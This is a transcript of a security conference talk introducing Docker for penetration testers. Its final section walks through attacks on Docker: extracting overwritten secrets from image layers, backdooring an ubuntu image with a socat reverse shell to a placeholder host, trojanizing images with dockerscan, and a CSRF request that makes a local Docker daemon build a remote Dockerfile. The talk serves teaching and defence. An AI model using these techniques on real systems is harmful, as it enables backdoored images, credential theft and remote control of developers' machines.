
Ross Simpson - Docker for Hackers

BSides Cape Town · 48:16 · 343 views · Published 2017-12

Good morning everyone. Talking first today will be Ross. He's going to be talking to us about Docker for hackers, so please give him a hand. [Applause]

Morning everyone. As has been said, my name is Ross, and I'm going to be talking about Docker for hackers. I'm a web services developer by day — so that's a lot of back-end stuff, joining systems, a bit of optimization — and I do some hackery, security-audit stuff by night, so Docker's quite a nice fit between those two realms. I've spoken at ZaCon previously, which was a Joburg conference — it's now 0xC0N, I think, the spin-off from that that started up this year — and I've had the privilege of speaking at BSides previously. I've got two Twitter accounts, just to make life difficult, and a blog where I rant about stuff that's probably not worth reading.

Today's talk is going to be mostly introductory — we're not dropping any Docker 0-days — but I became aware that a lot of people in security, and even devs, don't know very much about Docker, and to me it's one of the most useful tools of recent times. So I just want to make a case for why it's worth using, show you different use cases and a little bit of how to use it. I'm going to skip over some steps, so this does not replace a getting-started guide.

By all means, if you're interested, go and read a proper Docker getting-started guide; I've just tried to highlight a few interesting points, hopefully for inspiration or for warning.

Ultimately, Docker is a tool for running containers — which doesn't explain a whole lot. A container is typically a single application or service and its dependencies, so it's a nice little bundled, ready-to-run thing. It's not an operating system, it's not a virtual machine: it's literally an application and its dependencies, in a standardized format. The idea of containers is not something new — Docker didn't necessarily invent anything, but they did a lot to standardize it. So it's a bit like the Raspberry Pi: it's sort of the de facto container-running solution at the moment, although there are many others.

A lot of the time when people talk about containers, what they actually mean is images. Images are a little bit like an ISO file: the collection of all the layers and parts, the information about what is to be run. A container is an instance of that — one image might be run ten times, so you'd have ten running containers but only one source image they all came from. Docker is really popular with devops and microservices because it lets you very easily manage the deployment and scaling of these things.

If you've got microservices that need to talk to each other, rather than running a whole lot of virtual machines, you can run much smaller Docker containers.

I've mentioned virtual machines a few times. Docker has similarities to VMs in that it uses images that you can pass around: you can build once and deploy all over the place, people can share them on a network, and if you're a dev you can keep a snapshot of your environment and spin it up as needed to run different versions, or tweak something for staging. It also uses the host's hardware resources — there's a client and a server aspect, and the server aspect, the host running the containers, obviously can't use more RAM or disk space than it has, so you need to accommodate the number of containers you're running on that host and divide out the resources. You can also mount in shares, which is a really useful feature — you can have a shared directory that a lot of containers use, same as with virtual machines — and there's virtual networking, with bridging and host-networking options. So there's a little bit of security that brings you in terms of isolation, and a lot of flexibility — a lot that's in common with virtual machines. There's also a lot that's not in common with virtual machines.

If you build a virtual machine using Vagrant, you probably use something like Debian or Ubuntu as your base image, and you're going to end up with a couple of gigs' worth of images. If you've got a dev VM, a staging VM, a prod VM and a branch version, you're looking at maybe five different VMs at five gigs each — 25 gigs. Docker uses much, much smaller images, because it's just your code, any files you've attached, and dependencies, so you're probably working in megs, or tens to hundreds of megs, rather than gigs. Images also share layers: you pull down Ubuntu once, and if everything branches off Ubuntu, you've got that big base layer once and then a 100-meg layer per environment. It uses a lot less space, and it's a lot easier when you have a CI server or you're working over VPN — you don't have to pull down 25 gigs to get your environment up.

Another nice feature is the command-line interaction. Unlike Vagrant, you don't have to SSH into a Docker container to do things, or connect with remote desktop. You can actually pipe stuff in and out of it: you run it on your command line, pipe the output, and use your native operating system's tools to do other things, so it feels a lot more native — the tools you're running are a lot more accessible and reusable.

One thing I see as a bit of a downside is that the CPU is not emulated. When Docker containers are running, you can type ps or top on your Linux host and you will see the Docker processes — they've got their own separate PIDs. They're very much in the same space as your host, so if something does go horribly wrong, your host is potentially compromised. There are obviously a lot of steps towards isolation, so that shouldn't be a big concern, but do realize these are actual processes running on your host with some safeguards in place — it's not one big emulated ball running inside.

Docker runs pretty much everywhere these days: macOS, Windows, Linux, the cloud, even Raspberry Pis, which I found quite interesting. Again, there are client and server aspects, so mileage varies depending on what you're doing, but the Docker client at the very least should run almost anywhere and let you connect to a Docker host to start, stop and view containers, things like that.

There are official images — these are trusted, and you can download them from store.docker.com. Docker is also the organization: they vet a lot of these images and pretty much put their stamp of approval on them.

For example, if you pull down the ubuntu image, they've checked it out and made sure it's fairly stable and reliable. So when you use just ubuntu, without any kind of namespace or username prefix, that's coming from the Docker store, trusted by Docker. There are also community images: any one of us can push our own image up — they've got hub.docker.com, and the store will let you look at hub images too. The idea with the store, like with app stores, is that those are certified, pre-built images, whereas the hub is much more of a free-for-all, and everything there is prefixed with the username of the person who pushed it. So I could fork the official ubuntu one, but I can never replace it — I can only end up with my own version of it. It's a lot like Git with forking. You can also use a private repository, again like Git, for your network or your VPN: you can push images to your own image storage and pull them from there. You don't have to use the official docker.com sites, but they're obviously the easiest way to get up and running.

When you pull down an image — when you reference it — it's downloaded to your machine, so any other time you reference, for example, the official ubuntu or a namespaced one, it keeps using the copy on your machine.

When you create images, they're initially saved to your machine; you have to intentionally push them up to Docker Hub if you want them to be publicly available. So as I say, images are pulled down locally, most of what you're building is local, and pushing up is quite deliberate. You can also reuse names that are in use on store.docker.com: we could push an image called ubuntu locally, or to our own repository — there's no global restriction on names, just within store.docker.com itself. In the same way, if I run a private Docker repository — like a private GitHub — I can name my images anything, even if someone else has pushed a container with the same name to their repository. There's no communication, no global network or anything like that. But it does mean you can't always trust the name you see unless you also check where it's pulling from: if it's not coming from docker.com, there's no guarantee that ubuntu is the official, Docker-authorized container. So just be aware of your images.

That was quite a bit of theory, so let's take a look at what it actually is. This is a very popular BSD tool — a game, really — called fortune, which you can see on screen. I happen to be using a Mac, and if I try to run fortune on the Mac, it's not there. Yes, I probably could just brew install it, but we can also do it with Docker.

So let's take a look at that. I mentioned the Docker store — here I've done a search, and you'll see in the address bar that the source is the community, so it's actually pulling from the hub's collection of images, but through the store's UI. There's one in the middle there with 307 pulls, so that looks like one we can give a try. This is the hub page, showing the same information with a slightly different UI, and again you can see the same image. So we're going to give that one a run: we copy the full path — that's the username, forward slash, fortune — and we type docker run and specify that name.

The grey text is what Docker does. It says it can't find that image locally, so it's now going to try to pull it down from the store. I mentioned there are lots of layers — here you can see there are two layers that it's pulled down. Those layers would be reusable: if this author has made some other containers, there might be some reuse to speed up downloads and caching. You ultimately end up with a hash for the image that's been downloaded, it tells you it's downloaded, and it then runs the container, which puts out a rather grim message — but that is the output of fortune.
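
As a rough sketch of what that looks like on the command line — the actual hub username isn't named in the talk, so someuser is a stand-in:

    # Pull (on first use) and run a community fortune image.
    # "someuser" is a placeholder for the image author's Docker Hub username.
    docker run someuser/fortune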

As I mentioned, this is running in a terminal, so I haven't had to SSH into anything. I can just select, copy and paste that output, or pipe it somewhere — I really like that command-line interactability. This next part is not official output, I've just put it on my slide so you can get an idea, as we use different containers, of what size we're in for. This was a fresh Mac install with just Docker — I didn't have to install command-line tools, Homebrew, things like that — if I just want a four-meg app. So assuming Docker is installed, I just had to download four megs, and it's taking four megs of disk space. Very, very minimal. Compare that to Vagrant with an Ubuntu image, at three gigs just to get a four-meg app — not very ideal.

Let's take a more practical look at using Docker for something interesting: we're going to run the Apache web server. By default Docker uses bridge networking, so you're able to get internet access out, but incoming access is something you have to intentionally enable. To run Apache, the first thing I'm going to do is make an html directory, and I'm just going to output some text into that directory as index.html. This is on my local machine — no magic happening just yet.

What we want to do now is serve that on the internet or network. You can tell Docker to run in daemon mode — that's the -d after docker run. We can tell it to share port 8080 of the host machine, connecting to port 80 of the container that's going to be running; that's our port mapping, basically opening up a port and allowing traffic into the Docker container. The -v lets you mount in a volume: the html directory is on the host machine, and Apache, running in the container, needs access to it, so we mount the volume in, using our current directory's html folder, separated by a colon from where it should appear in the container's file system, which is /usr/local/apache2/htdocs. Now that we've configured everything, we run the image httpd — that's actually Apache. There's no username before it, so this is coming from Docker: their trusted image. Again it can't find the image locally, so it starts pulling it. You'll see there are multiple layers, and the very first layer already exists, so that didn't need to be downloaded again — it's reusing those layers. The more you use Docker, the less you actually end up downloading each time. There were some layers it needed, and it downloads them in parallel, which is quite nice: you see progress and how much you're downloading.

Again you get a hash at the end. I've labeled that as the container on the slide, but it's actually the image name — the image ID — so I've labeled it incorrectly. It's now started, and we return to our command prompt: like last time there's no output, because we ran in daemon mode — we get our prompt back and it runs in the background. If we open our web browser and go to localhost port 8080 on the host — again, no VNC, no desktop sharing, no fighting with browsers; you're using the native tools you're already used to — it connects, and Apache is serving that index.html file that's actually on our host machine.

Because it's on our host machine, we're able to change that text. We strike out "hello world" and change it to "hello hackers", just piping it into that file in our directory, and if we refresh the browser it's immediately updated. There's no syncing that happens — it's not like Docker imports it or has to poll or anything. It's literally like a symlink, mapped to the host machine's directory: anything that happens there happens for Apache inside Docker right away.

I mentioned it's running in the background. If you run docker ps, it's like a process list.

Here you can see all the Docker containers that are running. On the far left is the container ID — it's different from the image ID; if we spun up multiple copies of this image, each would have its own container ID, so this is how we reference a specific running instance. It tells us the image, which is httpd, the command — which we won't worry about for now — and the ports that are mapped. We can ask for the logs from that running container if we want to do some debugging, or make sure it started up correctly: we can see the Apache logs, which is what it's writing to its virtual terminal inside Docker.

We can also get a bash session into that container. This is kind of like vagrant ssh, except there's no SSH service running. Basically we're saying we want to attach to this container — not necessarily to view what it's doing in the primary terminal, more like a secondary terminal — so we're able to run bash inside the running container, asking for an interactive pseudo-terminal. It's almost like a second process now running inside the container. You can see the user is root at the same hash as the container ID, and you can see the path we're in, so we can do a listing of the htdocs directory and see our index.html file. The container thinks this is a local directory, but it's actually on our host machine, and everything just works, which is awesome.
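
The inspection commands in that walkthrough, sketched out — the container ID is whatever docker ps reports:

    docker ps                             # list running containers
    docker logs <container-id>            # dump what the process wrote to its terminal
    docker exec -it <container-id> bash   # open an interactive bash session inside it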

Getting a little closer to the realm of hacking: Nikto is a very popular tool you may want to run. The interesting thing here is the --rm flag — it's almost like incognito mode for containers. When a container runs, even once the process stops, there's still a record of it — a stopped container hanging around — so typically you can restart a container that ended. In this case we're saying: when this thing ends, delete it, get rid of any information it has. I wouldn't call this audit-secure; it's just convenience — you're no longer taking up the space, and anything Nikto writes to its home directory, for example, goes too. You might not want logs of who you've been scanning, and in this case it just deletes the containers it creates.

The steps are very much the same. Here we've referenced a user's version of Nikto built on Alpine; it pulled it down, cached layers, and so on. In this case we didn't have to tell it to run Nikto, but we did pass -host and example.com, so we've passed in command-line parameters, and Nikto has gone and run and output everything to the screen, because we didn't run in daemon mode — this is interactive, and we get our prompt back when it finishes.
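
Roughly, hedged the same way as before — the actual hub username isn't named, so someuser stands in:

    # --rm deletes the container (and anything Nikto wrote inside it) when it exits
    docker run --rm someuser/nikto -host example.com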

Another tool: Sublist3r. It's one that I quite like, so I've made a container for it myself — it's really, really easy to do, and we'll look at that just now. Same thing: it automatically runs the binary, we just pass in the command-line arguments we need, and it runs, outputs in color, and looks very native. It's a little large at 257 megs, but still nothing compared to booting a Vagrant Ubuntu or Kali Linux VM just to use one tool.

You can get really interesting with it. If you're doing CTFs or reverse engineering of hardware, you might come across some strange CPU architectures — not necessarily strange, but very hard to work with if you don't have the right tooling in place. For one of MWR's HackFu challenges, there was a MIPS binary that I needed to decompile. QEMU is a great emulator for running this stuff, but it's quite a big beast to install, it's a bit of a pain, sometimes stuff doesn't work — to run the binary you need a particular version of Debian, and cross-compiling is also just a real nightmare. So what I was able to do is package everything straight into Docker. I've done all the hard work.

All you have to do is pull down my debian-mipsel image that I've created. We're running again with an interactive pseudo-terminal, because we need to log in — this starts up like an actual Debian Linux environment. We're mounting our current directory into /host-share inside the Docker container. By default it starts up with a login prompt, which you see over there; you log in as root/root and you end up as root@debian-mipsel. That's not QEMU yet, but then you can make the host-share directory and mount it in — so now you're in mipsel with the share mounted, and you can run things like file on the binary. Here we have a 32-bit MIPS binary that we can run inside Docker via QEMU. Again, this is all command line, so you can pipe stuff into and out of it, and you're not fighting with horrible non-interactive pop-up windows — it's all in your terminal, or over SSH, or something like that. I've put up a similar image where I pre-bundled a whole bunch of tools — gdb, strace — so you're up and running at the cost of around 750 megs to a gig of download, one command line, and a few steps from the README.
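
A sketch of that flow — the image name follows what's described in the talk, but the exact repository and tag are an assumption, and the in-container steps are abbreviated:

    # Start the MIPS little-endian Debian environment, sharing the current directory
    docker run -it -v "$PWD":/host-share someuser/debian-mipsel
    # ... log in as root/root, mount the share inside, then inspect the target:
    file /host-share/challenge-binary   # a 32-bit MIPS executable, runnable via QEMU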

You're not fighting with dependencies and kernel versions and things like that. The nice thing about Docker is that once you've figured out what you need to do, you're able to script it, bundle it, and reproduce it, which makes life a whole lot easier.

Another very nice thing I came across along similar lines is something called dockcross, for cross-compilation. They've got a great Git repo — I think I've got the link just now. What you do is run their image — in this case dockcross/linux-armv7 — and you output it to a script. Remember I said you get a lot of command-line interaction: it pulls down their image, because we don't already have it, and what it outputs is a script. That script, when run, runs their Docker container, and you can give it commands. So what I'm able to do is this: I have a hello.c file locally on my Mac; I've generated their script using their container; and when I run it, it calls their container and uses the C compiler inside to compile that file, outputting hello-arm, inside their Linux ARM container. I know that's a bit confusing, but it's two lines of code.

Okay, so I run that command — and note we're not in the container terminal where I was running file earlier, this is back in the host Mac terminal — and I've produced an ARM executable file. That's where it's really, really useful if you're writing exploits and compiling things — for legitimate purposes, of course. These are all the images they have and the outputs they support, so you're not fighting with, I guess, something like 16 VMs, different dependencies, compilation arguments, things like that. Just by using a different image name to create these scripts, and telling the script how you want to compile a file, you can produce binaries for nearly every platform.
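
Based on dockcross's documented usage, the two commands look roughly like this — the armv7 target matches the talk, and the file names are illustrative:

    # Generate the helper script from the dockcross image, then make it executable
    docker run --rm dockcross/linux-armv7 > ./dockcross-linux-armv7
    chmod +x ./dockcross-linux-armv7

    # Compile hello.c for ARM using the cross toolchain inside the container
    ./dockcross-linux-armv7 bash -c '$CC hello.c -o hello-arm'
    file hello-arm   # back on the host: an ARM executable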

That's really useful: 900 megs, but zero effort — you're literally running two commands and compiling for ARM. A lot better than getting Android Studio up and running.

Let's look at something a little more hackery again, and some more command-line options. We're going to run Metasploit, and we're going to link some containers and pass in some environment variables, so we're extending our use of Docker a little. In this case we want a Postgres database for Metasploit to write its settings to and cache payloads in. I did have to find containers that would work together — there's possibly an easier way, but I just wanted to illustrate the principle. What I'm doing here is running Postgres in daemon mode — you can see it on the far right — and I've named it msf-postgres, for Metasploit Postgres. I've set an environment variable with -e, setting the Postgres user. That in itself doesn't do anything magic, but the way this postgres image is built, it looks for environment variables and overwrites its default config, such as the username. In this case, by setting the username to the one Metasploit tries by default, along with the default password, Metasploit will be able to connect just because we changed the username. I don't think I need that -t there, but we're running Postgres — that's going to be 287 megs — and it runs in the background.

Then what I'm able to do is run Metasploit, again with an interactive pseudo-terminal, linking in msf-postgres. That's just a name, so Docker knows what I'm referencing: when you run a container it generates a hash, and I don't want to copy and paste hashes, so I use a name I declared in the first line and reuse it in the second. When it's mapped into the Metasploit container, it's just going to be called postgres — so it maps a friendly name of mine to a local name inside the container. Then I'm forwarding port 8080 to 8080 for Metasploit, and I'm mapping my home folder in, because when Metasploit writes data into root's Metasploit directory inside Docker, I actually want it to come out onto my host machine, so I can reuse any output — logs, hashes, things it might have come across. In this case I'm using a Metasploit container from a user called mdouglas, which is able to connect to the Postgres one. So we're in for roughly 300 and 700 megs: for one gig you've got Metasploit up and running. You haven't fought with installing Ruby gems, native compilation or anything like that, you've still got the output going to your home directory, and you've got a reusable Postgres, so everything's cached — you're not scanning from scratch every time and rebuilding databases.
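
Stitched together — the image path and the POSTGRES_USER value are stand-ins, since the talk elides the exact values:

    # A Postgres container, named so it can be linked to later; the POSTGRES_USER
    # value is an assumption about what the Metasploit image expects
    docker run -d --name msf-postgres -e POSTGRES_USER=msf postgres

    # Metasploit, linked to the database (visible inside as "postgres"),
    # with a port mapping and the home directory mounted for loot and output
    docker run -it --link msf-postgres:postgres -p 8080:8080 -v "$HOME":/root mdouglas/metasploit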

You'll also be able to update this — you've got Docker running, so you've got Metasploit running in Docker really, really easily. The principle here is that you're able to link one container to another, so they can network, know about each other, and pass environment variables.

But what about Kali? We've looked at a few tools, and everyone knows Kali is the operating system of choice — what about running Kali inside Docker? I said earlier that Docker is normally a single application and its dependencies, and this is a whole Linux distro. Well, it's quite common for there to be images like ubuntu or debian: they come with tools like apt-get, /etc folders, /bin folders, so they break away from that rule a little — they're this whole operating-system platform — and the Kali guys have done exactly the same thing. There are official images you can get from their website; it's up on Docker Hub and you can just pull it down: docker run with an interactive pseudo-terminal, kali-linux-docker, and the command you want, /bin/bash. That'll drop you into a Kali shell.

There is a problem, though: they're not shipping the live DVD that you might run or install. It's not eight gigs of Kali Linux with all the tools installed; it's just the bare bones.

You've got apt, the repositories are there, the folder paths are the same — it's everything you're used to — you just have to install the tools themselves. So what you don't want to do is docker run Kali, pull it down to your machine, and rush off to an engagement where you have no internet access: you won't be able to use that image as it is. By all means set it up, configure it — you're able to save the changes you've made, make it your own, pull down what you want and use your own version of it. But rather than making manual changes, we can script those changes.

The way Docker images are traditionally built is with something called a Dockerfile — a build recipe. There are several lines that go into it, and we're going to make a custom version of Kali Linux for our own use. In the Dockerfile we specify where we want to start — what we want to build from. In this case we're using their official image, which has everything we need in order to install our packages.

Now, there are quite a few options for that first line of the Dockerfile. They've got something called scratch that you can reference, which is literally empty — a void, zero megabytes, nothing.

That's great if you have a binary you want to run on its own. An example might be something like BusyBox, or something your company has produced: you don't need a whole Linux subsystem to run a single standalone binary, so you can just map your binary in, with no underlying layer at all, and your Docker image should be almost the same size as the binary you've pushed in. Speaking of BusyBox, that's a valid layer you can pull down if you need some command-line tools — 1.13 megs — so it's really handy to build on top of if you need to do a few things: piping, tailing, grepping. Ubuntu is very popular, but it comes in at 122 megs. It's also fairly bare bones — you've got the CLI tools, you've got apt, but it really doesn't do much, and you're going to start pulling a whole lot of packages and dependencies as soon as you build on top of it. And then you have Alpine Linux: by comparison, it's only four megs. It's almost like the OpenWrt of desktop Linux — I'm not necessarily saying you should use it as a desktop OS, but it's amazing for Docker. A lot of the official images have now started switching over to Alpine; the images are a lot smaller for all the same functionality. There's a package manager, you can get all your libraries, and you can compile stuff.

So if you're not sure which base layer to use, I would definitely suggest giving Alpine a try — it's got apk instead of apt, but all the same functionality. Again, layers are shared, so if you're already building all your stuff off Ubuntu it should be fine; but if you're putting something out in the public domain and everyone else is using Alpine, do you want to be the guy who forces your user to download 122 megs he doesn't already have, because you're the only one using Ubuntu instead of Alpine? So please consider using Alpine.

Back to building our custom Kali Docker image, though. We specified where we want to start, which gives us our base layer to build on top of. MAINTAINER pretty much just lets people know who made it and how to get hold of you. Then you're able to issue commands that it must run — Docker works through these much like a batch file or a bash script. We're going to update apt and do a dist-upgrade before anything else, to make sure our Kali rolling is as up to date as it can be, and then in this case we're going to install the Metasploit framework, nmap, and wordlists for password crackers, so we've got a few basic tools in there. And when it runs, it drops us into bash, so we can choose which command to make use of.
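
Put together as a file, that recipe would look something along these lines — the package names follow the talk, and the maintainer line is obviously a placeholder:

    FROM kalilinux/kali-linux-docker
    MAINTAINER you@example.com

    # Bring the rolling release up to date, then pull in a few basics
    RUN apt update && apt -y dist-upgrade && \
        apt -y install metasploit-framework nmap wordlists

    # Drop into a shell so we can choose what to run
    CMD ["/bin/bash"]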

To make use of that Dockerfile, you just say docker build and point to the directory the file is in. In this case it's pulling an image — as I said, images are reused if already present, and you can see that step two of five is using a cache. So if you make changes to this Dockerfile — say you add a new line at the bottom — it doesn't always have to do the whole process again. You can save a lot of time and do a lot of upgrading and reusing of scripts without pulling down new packages and layers, if you do things correctly. I'm not going to get into it now, but it's worth knowing that layers are cached and there are various ways to cache or not cache things. We've also got a local Kali Linux repo, if you didn't know, which is really, really awesome. Once the build finishes — you can see the commands it runs as it goes through the various steps — right at the end we reach step five of five and it says successfully built, with a hash starting f5eed. There are ways to tag it at build time, but we're just going to tag it afterwards: we take the hash that was produced — that's an image — and tag it as mykali.

We can then run mykali. Listing the images I've pulled down, we've ended up at — well, 3.1 gigs after doing apt-gets and things like that, so these sizes do inflate quite quickly. You can see the nice name on the left — the repository — and the image ID; we can reference either to start it, but we're just going to run it interactively by name. We're now root at dbf…, which is the container ID, and we can run nmap. So we've built our own Kali container, and that image is now snapshotted, so we can start it whenever we want and spin up new instances from it.
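
The build–tag–run sequence, sketched with a placeholder for the actual image hash:

    docker build .                   # build from the Dockerfile in this directory
    docker tag <image-id> mykali     # give the resulting hash a friendly name
    docker run -it mykali            # start an interactive instance; then e.g. nmap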

Just to mention very quickly — I said earlier there are different networking options. You can run docker network ls and it will print out what's available, which is useful as Docker adds functionality, or if you want to know what your host supports. That should show you the options: bridge, none and host. None obviously isolates any network and TCP connectivity. Bridge is used by default, so your Docker containers can speak to each other, but you're going to need to expose ports if you want to be reachable. docker network inspect is also quite useful — it dumps a whole lot of networking information about a container and your current setup.
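
For reference, the two inspection commands mentioned:

    docker network ls               # list networks: bridge, host, none, ...
    docker network inspect bridge   # dump addressing and attached containers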

This is probably not too relevant when you're starting out, but when you start a Docker container you can use --net=host. This is more risky, because the container is using your host's network from inside Docker: if someone compromises your running container and opens up a reverse shell, that TCP port is open on the host — internet-facing, network-facing — so that container is now effectively exposing your network. Use it with caution. Previously there was also a bug where, running in this mode, if you tried to reboot or shut down the container, that message actually leaked out and the host shut down as well. So there's some magic, privileged connectivity happening there — don't use it unless you know it's really what you want.

So that's quite cool, but what about GUI applications, something like Burp Suite? What if we want to intercept traffic with Docker — surely that's not doable, we've spoken about command lines so much? Well, there are a few things we can do. There's x11vnc, which is a VNC server that provides a fake X11 display; we can use Firefox for browsing, with its proxy set to Burp Suite, which is the app we actually want to run; and there's something cool called noVNC, which is an HTML5 VNC client. You can bundle all of this together and create a container that listens on a web port and provides a web VNC, which connects to a VNC server, which has X11 and runs Firefox and Burp Suite — or you can just go and pull down this container, which does it all for you. You connect to your localhost on port 80, it starts, and you see a window manager, a Linux environment. Here I've got Firefox open in the background and Burp Suite in front, all happening inside Docker. There's no evidence of this on my machine: when I'm done, I can delete the container and it all goes away. I haven't had to install Burp Suite, Java, things like that — it's all contained — and I haven't given it access to my actual host display or anything crazy like that. Really useful.

That was a really quick fly-through of using Docker: command line, GUI, building images. But we need to talk about attacking Docker, because this is a hacker conference. This might not all be too relevant, but I found this information really interesting.

If you get a Docker container, or you run a Docker image, you don't necessarily have shell access or root access. If we take that Nikto image we ran earlier and tell it we want to run sh, rather than passing in command-line options, we get an error: Nikto started, and it tells us no host was specified. But we didn't want to run Nikto, we wanted a shell. The reason, in this case — and we've got a Dockerfile we can look at — is that along with the FROM line and the MAINTAINER, they've specified an entrypoint. That's what happens when the container starts: it runs the entrypoint, and the command by default is -h, printing the help. What we've done is only overwrite the command, so our sh got passed as an argument to the entrypoint. It's a bit confusing, and people have debated which should come first, but it's worth knowing you've got two layers of execution: the entrypoint and the command.

Luckily, all we need to do is specify a different entrypoint — in this case changing it to sh, rather than putting the sh at the end — and now we get dropped to a command line: a shell inside that container. But if we do a whoami, we're user, not root. In the previous case we saw we were root; this is just another line in that Dockerfile that says the user for this container is user. But there's just one more command-line option: we can say, hey Docker, I want to be root.
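
In flag form, the two overrides look like this — the image name again a stand-in:

    # Override the ENTRYPOINT to get a shell instead of the baked-in binary
    docker run -it --entrypoint sh someuser/nikto

    # Also override the USER the image set at build time
    docker run -it -u root --entrypoint sh someuser/nikto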

So if you're building containers and you think this has done anything to secure the code you're shipping: it hasn't. It's just a convenience that the container starts as a certain user — anyone running it can pick whatever command they want and be root in your container. Don't think containers are locked down or secure or anything like that.

What about finding sensitive data inside a container? We've spoken about these images available on Docker Hub; companies might have them on devs' machines, on servers, in private repositories. So let's run a container that I created specifically for this demo. It is a bit of a silly example, but we're running, again with an interactive terminal, the container I created, with bash, and we're just telling it to list files and cat key.pub.

A public key — right, what could possibly go wrong? Nothing, it's a public key. But let's take a slightly deeper look at this container. You can ask Docker to tell you its history, and there's this really interesting layer in there, created a few minutes earlier: this started from BusyBox, and there's a 906-byte layer and then a 300-byte layer — more layers than we'd need if I'd just pushed in one file. We can ask Docker to run not the image by name but that intermediate layer, and do the same thing: cat the "public" key — which is quite certainly a private key.

So if you do something wrong when you're building your container — or if your environment builds a production container and afterwards slips in dev credentials before pushing it to your dev server — then if someone compromises it, they can still go and access those files and config files you think you've overwritten. Committed over in dev mode or not, your prod creds could very possibly still be there.

Something else you can do, which is kind of fun, is tell Docker to save an image by name. That outputs it, out of the Docker ecosystem, to a file on your computer — or in this case to a pipe, running it through strings.

Because private keys are strings, the strings command does a really good job of finding this. This flattens all those layers, but it still hasn't erased that data: even though I overwrote the private key with the public key, they exist as different layers. The file system doesn't see the file anymore, but the data is still there in the image. That's a string, though, so it's easy to find — what if there's more interesting stuff? How about undeleting files? This isn't even necessarily a hard-drive image; it's layers of changes and files. Well, you can do docker save again, this time outputting to a binary file.

TestDisk and PhotoRec are great undelete tools for all platforms; they find tons of different file types. So I export that image — I'm not even aware of what the file system looks like or how many layers there are, I'm just snapshotting the whole thing to a local file — I run an undeleter on it, and it finds nine files from BusyBox. And if I look at the right file, you can see it has dug out the private key. So there could be binary files, image files, all kinds of things inside your Docker images. They're not safe even if they're deleted, even if they're not referenced — people can still run undeletes on published containers, even when the latest image no longer references that stuff.
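
The forensic commands from this demo, sketched — the image name and output file are placeholders, and running an intermediate layer by ID works on the Docker of this era:

    docker history someuser/leaky-image         # spot suspiciously small extra layers
    docker run -it <layer-id> sh                # run an intermediate layer directly
    docker save someuser/leaky-image | strings  # flatten to a tar stream, look for secrets
    docker save -o image.tar someuser/leaky-image
    photorec image.tar                          # carve deleted files out of the layers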

So if you've done stuff ages ago, or you've built off images someone else created, you don't know what's lying under the file system where you can't even see it.

Let's imagine now that we're a malicious dev at a company, or we get access at a company or to someone's machine — what about backdooring images? I said before that people reuse things like ubuntu. What we're able to do — this is going to be a bit complex, but bear with me — is inspect an image such as ubuntu, looking for the entrypoint or the command; as I mentioned, those are the two things that can happen when the container runs. We want to see what a target image does when it starts up, what the default behavior is, and it's useful to copy that command. Then we run the image, and this time run bash instead. This assumes you do have access to the image — you've either got a person's Docker Hub credentials, or you're on their network, or something like that. In this case I'm using ubuntu: I do an apt-get update and install socat, which is a great reverse-shell tool. I exit out, do a docker ps to see the name of the container I've just created — the one with socat installed — and commit it to a temp name.

That's just for my sake, so I've got a reference to it. So I've now got the target application plus socat as a separate container. Now I run the container I've created and saved, I pass in the old command, and then I run my reverse shell. What we do then is take the hash of that running container and commit it back over ubuntu.

When you do a docker commit, it saves that image under a new name — in this case, all the stuff we've been doing becomes ubuntu. The reason we did the second and third steps separately is that in step two we ran a shell, and in step three we ran the old command plus our socat — and that last command is what gets saved as the image's entrypoint or command. So now when someone runs ubuntu, it actually runs that line: everything it always used to do, plus starting a reverse shell. If this is a container someone uses in the workplace, it may very well function exactly as they expect but do something really, really nasty when they start it up. And as I say, if this gets pushed to Docker Hub and someone pulls it down, potentially bad things happen.
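
A rough sketch of that flow — the IDs and the attacker address are placeholders, and the exact socat invocation isn't given in the talk, so this is one plausible form:

    # 1. See what the target image runs on start
    docker inspect --format '{{.Config.Entrypoint}} {{.Config.Cmd}}' ubuntu

    # 2. Run a shell instead, install the implant, save the result
    docker run -it ubuntu bash     # inside: apt-get update && apt-get install -y socat
    docker commit <container-id> temp

    # 3. Run the implant plus the old command, and commit that over "ubuntu"
    docker run temp sh -c 'socat exec:/bin/sh tcp:10.0.0.1:4444 & exec /bin/bash'
    docker commit <container-id> ubuntu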

There's an easier way of doing this: a tool called dockerscan, which will find various vulnerabilities and let you run various analysis on containers, but which also has the option to backdoor them for you. Here we save ubuntu again, extracting it from Docker's file management and flattening it to a single file on our machine. We tell dockerscan to process the image — modify it, trojanize it. We point at the file we want to trojan and set where the reverse shell should connect back to. It does its thing, produces temp.tar, and tells us the command we need to run to listen for that reverse shell. We then tell Docker to load the tar file back in — this is Docker's way of importing and exporting.

Docker says: oh, ubuntu already exists — I'll just rename the old one to an empty string and bring yours in as ubuntu:latest. Again, we can't push this up to Docker Hub and replace their ubuntu:latest, but within someone's local machine or local environment we're able to change what happens when they reference ubuntu. In this case, we've got a backdoored image.

Let's think about attacking users. Developers have a whole lot of access these days — they're possibly better targets than prod servers, which might be locked down. We're going to use cross-site request forgery against a user. When Docker runs, the daemon can listen on TCP; by default it's a Unix socket.

There are a few things that might happen here — a few cases where it might not be running on a Unix socket but on a TCP socket — so let's just pretend it's running on 127.0.0.1:2375. If I visit a page — your website, someone else's website — that has malicious code on it, it can do a form POST to my localhost, telling the Docker daemon to do a build, and we're able to specify a remote Dockerfile — in this case, a script on Pastebin. I mentioned network-mode host being quite dangerous, so we're going to put that in there. And I get to choose what the container that gets built is called, so I can overwrite the local machine's ubuntu image. Now, normally your browser would complain about this, because there's cross-origin resource sharing and checks like that that need to happen — but with no payload on this POST, none of those checks fire. It goes straight through, and Docker happily accepts GET parameters on a POST request. Of course, we can slip in some JavaScript to make the form submit itself, so this can all happen in the background: you browse a website, you've got Docker listening on localhost, and the next thing you know your ubuntu image isn't what you thought it was.
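The request the malicious page fires is, in effect, the following build API call — shown here as curl for clarity, with the Dockerfile URL a placeholder for the Pastebin script; in the wild it would be a hidden, auto-submitting HTML form:

    # Ask the local daemon to build a remote Dockerfile with host networking,
    # tagging the result over the victim's ubuntu image
    curl -X POST "http://127.0.0.1:2375/build?remote=https://pastebin.com/raw/XXXX&t=ubuntu:latest&networkmode=host"
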

Here you can see I've got a four-meg ubuntu image, created just now — that's not the real image, that's the malicious one. And if we ran it with that POST happening outside of an iframe, this is the output you would see: it's very much what Docker normally does. You can see it's pulling from Alpine, you can see I've echoed "test" into hello.txt, and it ends up building and tagging that on my machine as ubuntu. So you're potentially taking over Docker from outside the network, just by getting people to click on a malicious link, which I think is quite cool.

